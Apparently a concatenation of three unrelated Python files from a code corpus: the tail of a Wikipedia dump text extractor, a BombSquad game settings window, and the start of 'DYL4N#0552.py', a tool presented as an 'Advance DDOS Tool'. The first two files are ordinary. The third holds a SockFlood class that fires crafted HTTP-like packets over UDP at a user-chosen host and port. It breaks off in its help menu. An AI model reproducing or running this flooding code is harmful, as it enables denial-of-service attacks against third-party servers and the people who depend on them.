logging.warn("writing to stdout, so no output compression (use an external tool)")
else:
nextFile = NextFile(out_file)
output = OutputSplitter(nextFile, file_size, file_compress)
# process pages
logging.info("Starting page extraction from %s.", input_file)
extract_start = default_timer()
# Parallel Map/Reduce:
# - pages to be processed are dispatched to workers
    #  - a reduce process collects the results, sorts them and prints them.
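    # Rough data flow:
    #   input dump -> (mapper loop below) -> jobs_queue -> extract_process workers
    #              -> output_queue -> reduce_process -> output (files or stdout)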
maxsize = 10 * process_count
# output queue
output_queue = Queue(maxsize=maxsize)
# Reduce job that sorts and prints output
reduce = Process(target=reduce_process, args=(output_queue, output))
reduce.start()
# initialize jobs queue
jobs_queue = Queue(maxsize=maxsize)
# start worker processes
logging.info("Using %d extract processes.", process_count)
workers = []
for _ in range(max(1, process_count)):
extractor = Process(target=extract_process,
args=(jobs_queue, output_queue, html_safe))
extractor.daemon = True # only live while parent process lives
extractor.start()
workers.append(extractor)
# Mapper process
# we collect individual lines, since str.join() is significantly faster
# than concatenation
page = []
id = ''
revid = ''
last_id = ''
ordinal = 0 # page count
inText = False
redirect = False
for line in input:
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
redirect = False
elif tag == 'id' and not id:
id = m.group(3)
elif tag == 'id' and id: # <revision> <id></id> </revision>
revid = m.group(3)
elif tag == 'title':
title = m.group(3)
elif tag == 'redirect':
redirect = True
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
colon = title.find(':')
if (colon < 0 or (title[:colon] in acceptedNamespaces) and id != last_id and
not redirect and not title.startswith(templateNamespace)):
job = (id, revid, urlbase, title, page, ordinal)
jobs_queue.put(job) # goes to any available extract_process
last_id = id
ordinal += 1
id = ''
revid = ''
page = []
input.close()
# signal termination
for _ in workers:
jobs_queue.put(None)
# wait for workers to terminate
for w in workers:
w.join()
# signal end of work to reduce process
output_queue.put(None)
# wait for it to finish
reduce.join()
if output != sys.stdout:
output.close()
extract_duration = default_timer() - extract_start
extract_rate = ordinal / extract_duration
logging.info("Finished %d-process extraction of %d articles in %.1fs (%.1f art/s)",
process_count, ordinal, extract_duration, extract_rate)
# ----------------------------------------------------------------------
# Multiprocess support
def extract_process(jobs_queue, output_queue, html_safe):
"""Pull tuples of raw page content, do CPU/regex-heavy fixup, push finished text
:param jobs_queue: where to get jobs.
:param output_queue: where to queue extracted text for output.
    :param html_safe: whether to convert entities in text to HTML.
"""
while True:
job = jobs_queue.get() # job is (id, revid, urlbase, title, page, ordinal)
if job:
out = StringIO() # memory buffer
Extractor(*job[:-1]).extract(out, html_safe) # (id, urlbase, title, page)
text = out.getvalue()
output_queue.put((job[-1], text)) # (ordinal, extracted_text)
out.close()
else:
break
def reduce_process(output_queue, output):
"""Pull finished article text, write series of files (or stdout)
:param output_queue: text to be output.
:param output: file object where to print.
"""
interval_start = default_timer()
period = 100000
# FIXME: use a heap
ordering_buffer = {} # collected pages
next_ordinal = 0 # sequence number of pages
while True:
if next_ordinal in ordering_buffer:
output.write(ordering_buffer.pop(next_ordinal))
next_ordinal += 1
# progress report
if next_ordinal % period == 0:
interval_rate = period / (default_timer() - interval_start)
logging.info("Extracted %d articles (%.1f art/s)",
next_ordinal, interval_rate)
interval_start = default_timer()
else:
# mapper puts None to signal finish
pair = output_queue.get()
if not pair:
break
ordinal, text = pair
ordering_buffer[ordinal] = text
# ----------------------------------------------------------------------
# Minimum size of output files
minFileSize = 200 * 1024
def main():
global urlbase, acceptedNamespaces
global expand_templates, templateCache
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter,
description=__doc__)
parser.add_argument("input",
help="XML wiki dump file")
groupO = parser.add_argument_group('Output')
groupO.add_argument("-o", "--output", default="text",
help="directory for extracted files (or '-' for dumping to stdout)")
groupO.add_argument("-b", "--bytes", default="1M",
help="maximum bytes per output file (default %(default)s)",
metavar="n[KMG]")
groupO.add_argument("-c", "--compress", action="store_true",
help="compress output files using bzip")
groupO.add_argument("--json", action="store_true",
help="write output in json format instead of the default <doc> format")
groupP = parser.add_argument_group('Processing')
groupP.add_argument("--html", action="store_true",
help="produce HTML output, subsumes --links")
groupP.add_argument("-l", "--links", action="store_true",
help="preserve links")
groupP.add_argument("-ns", "--namespaces", default="", metavar="ns1,ns2",
help="accepted namespaces")
groupP.add_argument("--templates",
help="use or create file containing templates")
groupP.add_argument("--no-templates", action="store_false",
help="Do not expand templates")
groupP.add_argument("--html-safe", default=True,
help="use to produce HTML safe output within <doc>...</doc>")
default_process_count = cpu_count() - 1
parser.add_argument("--processes", type=int, default=default_process_count,
help="Number of processes to use (default %(default)s)")
groupS = parser.add_argument_group('Special')
groupS.add_argument("-q", "--quiet", action="store_true",
help="suppress reporting progress info")
groupS.add_argument("--debug", action="store_true",
help="print debug info")
groupS.add_argument("-a", "--article", action="store_true",
help="analyze a file containing a single article (debug option)")
groupS.add_argument("-v", "--version", action="version",
version='%(prog)s ' + __version__,
help="print program version")
args = parser.parse_args()
Extractor.keepLinks = args.links
Extractor.HtmlFormatting = args.html
if args.html:
Extractor.keepLinks = True
Extractor.to_json = args.json
expand_templates = args.no_templates
try:
power = 'kmg'.find(args.bytes[-1].lower()) + 1
file_size = int(args.bytes[:-1]) * 1024 ** power
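        # e.g. "1M" -> 1 * 1024**2 bytes, "500K" -> 500 * 1024 bytes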
if file_size < minFileSize:
raise ValueError()
except ValueError:
logging.error('Insufficient or invalid size: %s', args.bytes)
return
if args.namespaces:
acceptedNamespaces = set(args.namespaces.split(','))
FORMAT = '%(levelname)s: %(message)s'
logging.basicConfig(format=FORMAT)
logger = logging.getLogger()
if not args.quiet:
logger.setLevel(logging.INFO)
if args.debug:
logger.setLevel(logging.DEBUG)
input_file = args.input
if not Extractor.keepLinks:
ignoreTag('a')
# sharing cache of parser templates is too slow:
# manager = Manager()
# templateCache = manager.dict()
if args.article:
if args.templates:
if os.path.exists(args.templates):
with open(args.templates) as file:
load_templates(file)
with open(input_file) as file:
page = file.read()
ids = re.findall(r'<id>(\d*?)</id>', page)
id = ids[0] if ids else ''
revid = ids[1] if len(ids) > 1 else ''
m = re.search(r'<title>(.*?)</title>', page)
if m:
title = m.group(1)
else:
logging.error('Missing title element')
return
m = re.search(r'<base>(.*?)</base>', page)
if m:
base = m.group(1)
urlbase = base[:base.rfind("/")]
else:
urlbase = ''
Extractor(id, revid, urlbase, title, [page]).extract(sys.stdout)
return
output_path = args.output
if output_path != '-' and not os.path.isdir(output_path):
try:
os.makedirs(output_path)
except:
logging.error('Could not create: %s', output_path)
return
process_dump(input_file, args.templates, output_path, file_size,
args.compress, args.processes, args.html_safe)
if __name__ == '__main__':
main()
|
advanced.py
|
# Released under the MIT License. See LICENSE for details.
#
"""UI functionality for advanced settings."""
from __future__ import annotations
from typing import TYPE_CHECKING
import _ba
import ba
from bastd.ui import popup as popup_ui
if TYPE_CHECKING:
from typing import Any, Optional
class AdvancedSettingsWindow(ba.Window):
"""Window for editing advanced game settings."""
def __init__(self,
transition: str = 'in_right',
origin_widget: ba.Widget = None):
# pylint: disable=too-many-statements
from ba.internal import master_server_get
import threading
# Preload some modules we use in a background thread so we won't
# have a visual hitch when the user taps them.
threading.Thread(target=self._preload_modules).start()
app = ba.app
# If they provided an origin-widget, scale up from that.
scale_origin: Optional[tuple[float, float]]
if origin_widget is not None:
self._transition_out = 'out_scale'
scale_origin = origin_widget.get_screen_space_center()
transition = 'in_scale'
else:
self._transition_out = 'out_right'
scale_origin = None
uiscale = ba.app.ui.uiscale
self._width = 870.0 if uiscale is ba.UIScale.SMALL else 670.0
x_inset = 100 if uiscale is ba.UIScale.SMALL else 0
self._height = (390.0 if uiscale is ba.UIScale.SMALL else
450.0 if uiscale is ba.UIScale.MEDIUM else 520.0)
self._spacing = 32
self._menu_open = False
top_extra = 10 if uiscale is ba.UIScale.SMALL else 0
super().__init__(root_widget=ba.containerwidget(
size=(self._width, self._height + top_extra),
transition=transition,
toolbar_visibility='menu_minimal',
scale_origin_stack_offset=scale_origin,
scale=(2.06 if uiscale is ba.UIScale.SMALL else
1.4 if uiscale is ba.UIScale.MEDIUM else 1.0),
stack_offset=(0, -25) if uiscale is ba.UIScale.SMALL else (0, 0)))
self._prev_lang = ''
self._prev_lang_list: list[str] = []
self._complete_langs_list: Optional[list] = None
self._complete_langs_error = False
self._language_popup: Optional[popup_ui.PopupMenu] = None
# In vr-mode, the internal keyboard is currently the *only* option,
# so no need to show this.
self._show_always_use_internal_keyboard = (not app.vr_mode
and not app.iircade_mode)
self._scroll_width = self._width - (100 + 2 * x_inset)
self._scroll_height = self._height - 115.0
self._sub_width = self._scroll_width * 0.95
self._sub_height = 724.0
if self._show_always_use_internal_keyboard:
self._sub_height += 62
self._show_disable_gyro = app.platform in {'ios', 'android'}
if self._show_disable_gyro:
self._sub_height += 42
self._do_vr_test_button = app.vr_mode
self._do_net_test_button = True
self._extra_button_spacing = self._spacing * 2.5
if self._do_vr_test_button:
self._sub_height += self._extra_button_spacing
if self._do_net_test_button:
self._sub_height += self._extra_button_spacing
self._sub_height += self._spacing * 2.0 # plugins
self._r = 'settingsWindowAdvanced'
if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
ba.containerwidget(edit=self._root_widget,
on_cancel_call=self._do_back)
self._back_button = None
else:
self._back_button = ba.buttonwidget(
parent=self._root_widget,
position=(53 + x_inset, self._height - 60),
size=(140, 60),
scale=0.8,
autoselect=True,
label=ba.Lstr(resource='backText'),
button_type='back',
on_activate_call=self._do_back)
ba.containerwidget(edit=self._root_widget,
cancel_button=self._back_button)
self._title_text = ba.textwidget(parent=self._root_widget,
position=(0, self._height - 52),
size=(self._width, 25),
text=ba.Lstr(resource=self._r +
'.titleText'),
color=app.ui.title_color,
h_align='center',
v_align='top')
if self._back_button is not None:
ba.buttonwidget(edit=self._back_button,
button_type='backSmall',
size=(60, 60),
label=ba.charstr(ba.SpecialChar.BACK))
self._scrollwidget = ba.scrollwidget(parent=self._root_widget,
position=(50 + x_inset, 50),
simple_culling_v=20.0,
highlight=False,
size=(self._scroll_width,
self._scroll_height),
selection_loops_to_parent=True)
ba.widget(edit=self._scrollwidget, right_widget=self._scrollwidget)
self._subcontainer = ba.containerwidget(parent=self._scrollwidget,
size=(self._sub_width,
self._sub_height),
background=False,
selection_loops_to_parent=True)
self._rebuild()
# Rebuild periodically to pick up language changes/additions/etc.
self._rebuild_timer = ba.Timer(1.0,
ba.WeakCall(self._rebuild),
repeat=True,
timetype=ba.TimeType.REAL)
# Fetch the list of completed languages.
master_server_get('bsLangGetCompleted', {'b': app.build_number},
callback=ba.WeakCall(self._completed_langs_cb))
@staticmethod
def _preload_modules() -> None:
"""Preload modules we use (called in bg thread)."""
from bastd.ui import config as _unused1
from ba import modutils as _unused2
from bastd.ui.settings import vrtesting as _unused3
from bastd.ui.settings import nettesting as _unused4
from bastd.ui import appinvite as _unused5
from bastd.ui import account as _unused6
from bastd.ui import promocode as _unused7
from bastd.ui import debug as _unused8
from bastd.ui.settings import plugins as _unused9
def _update_lang_status(self) -> None:
if self._complete_langs_list is not None:
up_to_date = (ba.app.lang.language in self._complete_langs_list)
ba.textwidget(
edit=self._lang_status_text,
text='' if ba.app.lang.language == 'Test' else ba.Lstr(
resource=self._r + '.translationNoUpdateNeededText')
if up_to_date else ba.Lstr(resource=self._r +
'.translationUpdateNeededText'),
color=(0.2, 1.0, 0.2, 0.8) if up_to_date else
(1.0, 0.2, 0.2, 0.8))
else:
ba.textwidget(
edit=self._lang_status_text,
text=ba.Lstr(resource=self._r + '.translationFetchErrorText')
if self._complete_langs_error else ba.Lstr(
resource=self._r + '.translationFetchingStatusText'),
color=(1.0, 0.5, 0.2) if self._complete_langs_error else
(0.7, 0.7, 0.7))
def _rebuild(self) -> None:
# pylint: disable=too-many-statements
# pylint: disable=too-many-branches
# pylint: disable=too-many-locals
from bastd.ui.config import ConfigCheckBox
from ba.modutils import show_user_scripts
available_languages = ba.app.lang.available_languages
# Don't rebuild if the menu is open or if our language and
# language-list hasn't changed.
# NOTE - although we now support widgets updating their own
# translations, we still change the label formatting on the language
        # menu based on the language, so we still need this. However, we could
        # make this more limited so that it only rebuilds that one menu instead
        # of everything.
if self._menu_open or (self._prev_lang == _ba.app.config.get(
'Lang', None) and self._prev_lang_list == available_languages):
return
self._prev_lang = _ba.app.config.get('Lang', None)
self._prev_lang_list = available_languages
# Clear out our sub-container.
children = self._subcontainer.get_children()
for child in children:
child.delete()
v = self._sub_height - 35
v -= self._spacing * 1.2
# Update our existing back button and title.
if self._back_button is not None:
ba.buttonwidget(edit=self._back_button,
label=ba.Lstr(resource='backText'))
ba.buttonwidget(edit=self._back_button,
label=ba.charstr(ba.SpecialChar.BACK))
ba.textwidget(edit=self._title_text,
text=ba.Lstr(resource=self._r + '.titleText'))
this_button_width = 410
self._promo_code_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 14),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.enterPromoCodeText'),
text_scale=1.0,
on_activate_call=self._on_promo_code_press)
if self._back_button is not None:
ba.widget(edit=self._promo_code_button,
up_widget=self._back_button,
left_widget=self._back_button)
v -= self._extra_button_spacing * 0.8
ba.textwidget(parent=self._subcontainer,
position=(200, v + 10),
size=(0, 0),
text=ba.Lstr(resource=self._r + '.languageText'),
maxwidth=150,
scale=0.95,
color=ba.app.ui.title_color,
h_align='right',
v_align='center')
languages = _ba.app.lang.available_languages
cur_lang = _ba.app.config.get('Lang', None)
if cur_lang is None:
cur_lang = 'Auto'
# We have a special dict of language names in that language
# so we don't have to go digging through each full language.
try:
import json
with open('ba_data/data/langdata.json',
encoding='utf-8') as infile:
lang_names_translated = (json.loads(
infile.read())['lang_names_translated'])
except Exception:
ba.print_exception('Error reading lang data.')
lang_names_translated = {}
langs_translated = {}
for lang in languages:
langs_translated[lang] = lang_names_translated.get(lang, lang)
langs_full = {}
for lang in languages:
lang_translated = ba.Lstr(translate=('languages', lang)).evaluate()
if langs_translated[lang] == lang_translated:
langs_full[lang] = lang_translated
else:
langs_full[lang] = (langs_translated[lang] + ' (' +
lang_translated + ')')
self._language_popup = popup_ui.PopupMenu(
parent=self._subcontainer,
position=(210, v - 19),
width=150,
opening_call=ba.WeakCall(self._on_menu_open),
closing_call=ba.WeakCall(self._on_menu_close),
autoselect=False,
on_value_change_call=ba.WeakCall(self._on_menu_choice),
choices=['Auto'] + languages,
button_size=(250, 60),
choices_display=([
ba.Lstr(value=(ba.Lstr(resource='autoText').evaluate() + ' (' +
ba.Lstr(translate=('languages',
ba.app.lang.default_language
)).evaluate() + ')'))
] + [ba.Lstr(value=langs_full[l]) for l in languages]),
current_choice=cur_lang)
v -= self._spacing * 1.8
ba.textwidget(parent=self._subcontainer,
position=(self._sub_width * 0.5, v + 10),
size=(0, 0),
text=ba.Lstr(resource=self._r + '.helpTranslateText',
subs=[('${APP_NAME}',
ba.Lstr(resource='titleText'))]),
maxwidth=self._sub_width * 0.9,
max_height=55,
flatness=1.0,
scale=0.65,
color=(0.4, 0.9, 0.4, 0.8),
h_align='center',
v_align='center')
v -= self._spacing * 1.9
this_button_width = 410
self._translation_editor_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 24),
size=(this_button_width, 60),
label=ba.Lstr(resource=self._r + '.translationEditorButtonText',
subs=[('${APP_NAME}', ba.Lstr(resource='titleText'))
]),
autoselect=True,
on_activate_call=ba.Call(
ba.open_url, 'https://legacy.ballistica.net/translate'))
self._lang_status_text = ba.textwidget(parent=self._subcontainer,
position=(self._sub_width * 0.5,
v - 40),
size=(0, 0),
text='',
flatness=1.0,
scale=0.63,
h_align='center',
v_align='center',
maxwidth=400.0)
self._update_lang_status()
v -= 40
lang_inform = _ba.get_account_misc_val('langInform', False)
self._language_inform_checkbox = cbw = ba.checkboxwidget(
parent=self._subcontainer,
position=(50, v - 50),
size=(self._sub_width - 100, 30),
autoselect=True,
maxwidth=430,
textcolor=(0.8, 0.8, 0.8),
value=lang_inform,
text=ba.Lstr(resource=self._r + '.translationInformMe'),
on_value_change_call=ba.WeakCall(
self._on_lang_inform_value_change))
ba.widget(edit=self._translation_editor_button,
down_widget=cbw,
up_widget=self._language_popup.get_button())
v -= self._spacing * 3.0
self._kick_idle_players_check_box = ConfigCheckBox(
parent=self._subcontainer,
position=(50, v),
size=(self._sub_width - 100, 30),
configkey='Kick Idle Players',
displayname=ba.Lstr(resource=self._r + '.kickIdlePlayersText'),
scale=1.0,
maxwidth=430)
v -= 42
self._disable_camera_shake_check_box = ConfigCheckBox(
parent=self._subcontainer,
position=(50, v),
size=(self._sub_width - 100, 30),
configkey='Disable Camera Shake',
displayname=ba.Lstr(resource=self._r + '.disableCameraShakeText'),
scale=1.0,
maxwidth=430)
self._disable_gyro_check_box: Optional[ConfigCheckBox] = None
if self._show_disable_gyro:
v -= 42
self._disable_gyro_check_box = ConfigCheckBox(
parent=self._subcontainer,
position=(50, v),
size=(self._sub_width - 100, 30),
configkey='Disable Camera Gyro',
displayname=ba.Lstr(resource=self._r +
'.disableCameraGyroscopeMotionText'),
scale=1.0,
maxwidth=430)
self._always_use_internal_keyboard_check_box: Optional[ConfigCheckBox]
if self._show_always_use_internal_keyboard:
v -= 42
self._always_use_internal_keyboard_check_box = ConfigCheckBox(
parent=self._subcontainer,
position=(50, v),
size=(self._sub_width - 100, 30),
configkey='Always Use Internal Keyboard',
autoselect=True,
displayname=ba.Lstr(resource=self._r +
'.alwaysUseInternalKeyboardText'),
scale=1.0,
maxwidth=430)
ba.textwidget(
parent=self._subcontainer,
position=(90, v - 10),
size=(0, 0),
text=ba.Lstr(resource=self._r +
'.alwaysUseInternalKeyboardDescriptionText'),
maxwidth=400,
flatness=1.0,
scale=0.65,
color=(0.4, 0.9, 0.4, 0.8),
h_align='left',
v_align='center')
v -= 20
else:
self._always_use_internal_keyboard_check_box = None
v -= self._spacing * 2.1
this_button_width = 410
self._show_user_mods_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 10),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.showUserModsText'),
text_scale=1.0,
on_activate_call=show_user_scripts)
if self._show_always_use_internal_keyboard:
assert self._always_use_internal_keyboard_check_box is not None
ba.widget(edit=self._always_use_internal_keyboard_check_box.widget,
down_widget=self._show_user_mods_button)
ba.widget(
edit=self._show_user_mods_button,
up_widget=self._always_use_internal_keyboard_check_box.widget)
else:
ba.widget(edit=self._show_user_mods_button,
up_widget=self._kick_idle_players_check_box.widget)
ba.widget(edit=self._kick_idle_players_check_box.widget,
down_widget=self._show_user_mods_button)
v -= self._spacing * 2.0
self._modding_guide_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 10),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.moddingGuideText'),
text_scale=1.0,
on_activate_call=ba.Call(
ba.open_url,
'http://www.froemling.net/docs/bombsquad-modding-guide'))
v -= self._spacing * 2.0
self._plugins_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 10),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource='pluginsText'),
text_scale=1.0,
on_activate_call=self._on_plugins_button_press)
v -= self._spacing * 0.6
self._vr_test_button: Optional[ba.Widget]
if self._do_vr_test_button:
v -= self._extra_button_spacing
self._vr_test_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 14),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.vrTestingText'),
text_scale=1.0,
on_activate_call=self._on_vr_test_press)
else:
self._vr_test_button = None
self._net_test_button: Optional[ba.Widget]
if self._do_net_test_button:
v -= self._extra_button_spacing
self._net_test_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 14),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.netTestingText'),
text_scale=1.0,
on_activate_call=self._on_net_test_press)
else:
self._net_test_button = None
v -= 70
self._benchmarks_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 14),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.benchmarksText'),
text_scale=1.0,
on_activate_call=self._on_benchmark_press)
for child in self._subcontainer.get_children():
ba.widget(edit=child, show_buffer_bottom=30, show_buffer_top=20)
if ba.app.ui.use_toolbars:
pbtn = _ba.get_special_widget('party_button')
ba.widget(edit=self._scrollwidget, right_widget=pbtn)
if self._back_button is None:
ba.widget(edit=self._scrollwidget,
left_widget=_ba.get_special_widget('back_button'))
self._restore_state()
def _show_restart_needed(self, value: Any) -> None:
del value # Unused.
ba.screenmessage(ba.Lstr(resource=self._r + '.mustRestartText'),
color=(1, 1, 0))
def _on_lang_inform_value_change(self, val: bool) -> None:
_ba.add_transaction({
'type': 'SET_MISC_VAL',
'name': 'langInform',
'value': val
})
_ba.run_transactions()
def _on_vr_test_press(self) -> None:
from bastd.ui.settings.vrtesting import VRTestingWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
VRTestingWindow(transition='in_right').get_root_widget())
def _on_net_test_press(self) -> None:
from bastd.ui.settings.nettesting import NetTestingWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
NetTestingWindow(transition='in_right').get_root_widget())
def _on_friend_promo_code_press(self) -> None:
from bastd.ui import appinvite
from bastd.ui import account
if _ba.get_account_state() != 'signed_in':
account.show_sign_in_prompt()
return
appinvite.handle_app_invites_press()
def _on_plugins_button_press(self) -> None:
from bastd.ui.settings.plugins import PluginSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
PluginSettingsWindow(
origin_widget=self._plugins_button).get_root_widget())
def _on_promo_code_press(self) -> None:
from bastd.ui.promocode import PromoCodeWindow
from bastd.ui.account import show_sign_in_prompt
# We have to be logged in for promo-codes to work.
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
PromoCodeWindow(
origin_widget=self._promo_code_button).get_root_widget())
def _on_benchmark_press(self) -> None:
from bastd.ui.debug import DebugWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
DebugWindow(transition='in_right').get_root_widget())
def _save_state(self) -> None:
# pylint: disable=too-many-branches
try:
sel = self._root_widget.get_selected_child()
if sel == self._scrollwidget:
sel = self._subcontainer.get_selected_child()
if sel == self._vr_test_button:
sel_name = 'VRTest'
elif sel == self._net_test_button:
sel_name = 'NetTest'
elif sel == self._promo_code_button:
sel_name = 'PromoCode'
elif sel == self._benchmarks_button:
sel_name = 'Benchmarks'
elif sel == self._kick_idle_players_check_box.widget:
sel_name = 'KickIdlePlayers'
elif sel == self._disable_camera_shake_check_box.widget:
sel_name = 'DisableCameraShake'
elif (self._always_use_internal_keyboard_check_box is not None
and sel
== self._always_use_internal_keyboard_check_box.widget):
sel_name = 'AlwaysUseInternalKeyboard'
elif (self._disable_gyro_check_box is not None
and sel == self._disable_gyro_check_box.widget):
sel_name = 'DisableGyro'
elif (self._language_popup is not None
and sel == self._language_popup.get_button()):
sel_name = 'Languages'
elif sel == self._translation_editor_button:
sel_name = 'TranslationEditor'
elif sel == self._show_user_mods_button:
sel_name = 'ShowUserMods'
elif sel == self._plugins_button:
sel_name = 'Plugins'
elif sel == self._modding_guide_button:
sel_name = 'ModdingGuide'
elif sel == self._language_inform_checkbox:
sel_name = 'LangInform'
else:
raise ValueError(f'unrecognized selection \'{sel}\'')
elif sel == self._back_button:
sel_name = 'Back'
else:
raise ValueError(f'unrecognized selection \'{sel}\'')
ba.app.ui.window_states[type(self)] = {'sel_name': sel_name}
except Exception:
ba.print_exception(f'Error saving state for {self.__class__}')
def _restore_state(self) -> None:
# pylint: disable=too-many-branches
try:
sel_name = ba.app.ui.window_states.get(type(self),
{}).get('sel_name')
if sel_name == 'Back':
sel = self._back_button
else:
ba.containerwidget(edit=self._root_widget,
selected_child=self._scrollwidget)
if sel_name == 'VRTest':
sel = self._vr_test_button
elif sel_name == 'NetTest':
sel = self._net_test_button
elif sel_name == 'PromoCode':
sel = self._promo_code_button
elif sel_name == 'Benchmarks':
sel = self._benchmarks_button
elif sel_name == 'KickIdlePlayers':
sel = self._kick_idle_players_check_box.widget
elif sel_name == 'DisableCameraShake':
sel = self._disable_camera_shake_check_box.widget
elif (sel_name == 'AlwaysUseInternalKeyboard'
and self._always_use_internal_keyboard_check_box
is not None):
sel = self._always_use_internal_keyboard_check_box.widget
elif (sel_name == 'DisableGyro'
and self._disable_gyro_check_box is not None):
sel = self._disable_gyro_check_box.widget
elif (sel_name == 'Languages'
and self._language_popup is not None):
sel = self._language_popup.get_button()
elif sel_name == 'TranslationEditor':
sel = self._translation_editor_button
elif sel_name == 'ShowUserMods':
sel = self._show_user_mods_button
elif sel_name == 'Plugins':
sel = self._plugins_button
elif sel_name == 'ModdingGuide':
sel = self._modding_guide_button
elif sel_name == 'LangInform':
sel = self._language_inform_checkbox
else:
sel = None
if sel is not None:
ba.containerwidget(edit=self._subcontainer,
selected_child=sel,
visible_child=sel)
except Exception:
ba.print_exception(f'Error restoring state for {self.__class__}')
def _on_menu_open(self) -> None:
self._menu_open = True
def _on_menu_close(self) -> None:
self._menu_open = False
def _on_menu_choice(self, choice: str) -> None:
ba.app.lang.setlanguage(None if choice == 'Auto' else choice)
self._save_state()
ba.timer(0.1, ba.WeakCall(self._rebuild), timetype=ba.TimeType.REAL)
def _completed_langs_cb(self, results: Optional[dict[str, Any]]) -> None:
if results is not None and results['langs'] is not None:
self._complete_langs_list = results['langs']
self._complete_langs_error = False
else:
self._complete_langs_list = None
self._complete_langs_error = True
ba.timer(0.001,
ba.WeakCall(self._update_lang_status),
timetype=ba.TimeType.REAL)
def _do_back(self) -> None:
from bastd.ui.settings.allsettings import AllSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
ba.app.ui.set_main_menu_window(
AllSettingsWindow(transition='in_left').get_root_widget())
|
DYL4N#0552.py
|
import os
import socket
import string
import random
import threading
from colorama import Fore, Back, Style
class SockFlood:
def __init__(self):
os.system("cls")
os.system("title D.DDOS - An Advance DDOS Tool ")
self.host=None
self.portnum=None
self.threads=None
def graphics(self):
banner="""
DDDDDDDDDDDDD YYYYYYY YYYYYYYLLLLLLLLLLL 444444444 NNNNNNNN NNNNNNNN
D::::::::::::DDD Y:::::Y Y:::::YL:::::::::L 4::::::::4 N:::::::N N::::::N
D:::::::::::::::DD Y:::::Y Y:::::YL:::::::::L 4:::::::::4 N::::::::N N::::::N
DDD:::::DDDDD:::::D Y::::::Y Y::::::YLL:::::::LL 4::::44::::4 N:::::::::N N::::::N
D:::::D D:::::D YYY:::::Y Y:::::YYY L:::::L 4::::4 4::::4 N::::::::::N N::::::N
D:::::D D:::::D Y:::::Y Y:::::Y L:::::L 4::::4 4::::4 N:::::::::::N N::::::N
D:::::D D:::::D Y:::::Y:::::Y L:::::L 4::::4 4::::4 N:::::::N::::N N::::::N
D:::::D D:::::D Y:::::::::Y L:::::L 4::::444444::::444N::::::N N::::N N::::::N
D:::::D D:::::D Y:::::::Y L:::::L 4::::::::::::::::4N::::::N N::::N:::::::N
D:::::D D:::::D Y:::::Y L:::::L 4444444444:::::444N::::::N N:::::::::::N
D:::::D D:::::D Y:::::Y L:::::L 4::::4 N::::::N N::::::::::N
D:::::D D:::::D Y:::::Y L:::::L LLLLLL 4::::4 N::::::N N:::::::::N
DDD:::::DDDDD:::::D Y:::::Y LL:::::::LLLLLLLLL:::::L 4::::4 N::::::N N::::::::N
D:::::::::::::::DD YYYY:::::YYYY L::::::::::::::::::::::L 44::::::44N::::::N N:::::::N
D::::::::::::DDD Y:::::::::::Y L::::::::::::::::::::::L 4::::::::4N::::::N N::::::N
DDDDDDDDDDDDD YYYYYYYYYYYYY LLLLLLLLLLLLLLLLLLLLLLLL 4444444444NNNNNNNN NNNNNNN
"""
print(Fore.RED+banner)
print(Fore.YELLOW+"""
[+] An Advance DDOS Tool Using Sockets Written in Python [+]"""+Fore.GREEN+"""
[+] Developer : DYL4N#0552 [ """+Fore.WHITE+"""s1ralt ]""")
print(Fore.WHITE+"""
[+] Type `help` If You Are A Beginner [+]
""")
def start_attack(self,host,port=None):
self.sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
try:
url_path=str(string.ascii_letters + string.digits + string.punctuation)
byt = (f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n").encode()
if not port:
self.sock.sendto(byt,(host,80))
elif port:
self.sock.sendto(byt,(host,int(port)))
print(Fore.WHITE+"""[+] Sent Byte Successfully""")
except Exception as e:
print(Fore.RED+f"""
[-] Socket ERROR! Fatal X_X
[-] EXCEPTION : {e}
""")
def command_parser(self,command):
if command=="help":
print(Fore.WHITE+"""
Welcome To D.DDOS Help Menu -
(+) host %HOST% - Enter the Host Domain or Ip Address [!Required]
(+) port %PORT% - Enter a custom port if you have, or just don't use it will use port 80
